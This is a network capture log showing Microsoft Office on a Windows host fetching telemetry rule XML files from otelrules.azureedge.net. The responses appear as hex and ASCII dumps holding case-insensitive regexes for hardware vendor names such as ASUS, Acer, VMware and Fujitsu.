2024-11-30 11:48:04 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:06 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:06 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:06 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114806Z-174f7845968n2hr8hC1EWR9cag0000001140000000000y7d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:06 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:06 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:06 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:06 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: e2bedc78-c01e-0066-2f35-40a1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114806Z-174f7845968glpgnhC1EWR7uec00000011eg000000009zkz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:06 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:06 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:06 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:06 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114806Z-174f7845968j6t2phC1EWRcfe800000011fg0000000080q4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:06 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:06 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:07 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:06 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 83c53042-b01e-0053-2eb2-42cdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114806Z-174f78459684db9fhC1EWRc7g400000001a00000000083p9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:07 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49766	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:06 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:07 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:06 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114806Z-174f78459684bddphC1EWRbht40000001100000000009r1e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:07 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:08 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:08 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114808Z-174f7845968qj8jrhC1EWRh41s000000118g000000008c7q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:09 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:08 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:08 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114808Z-174f78459685m244hC1EWRgp2c000000118g000000003h0r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:09 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:08 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:08 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: e94c41b0-301e-0000-6d41-41eecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114808Z-174f784596886s2bhC1EWR743w00000011cg000000006vps x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:09 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49774	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:08 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:09 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114809Z-174f7845968j6t2phC1EWRcfe800000011k0000000004p2m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:09 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:08 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:09 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114809Z-174f7845968xr5c2hC1EWRd0hn0000000k4g000000009ezn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:09 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49776	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:10 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:11 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:11 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114811Z-174f7845968ljs8phC1EWRe6en00000011ag00000000139x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:11 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49777	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:10 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
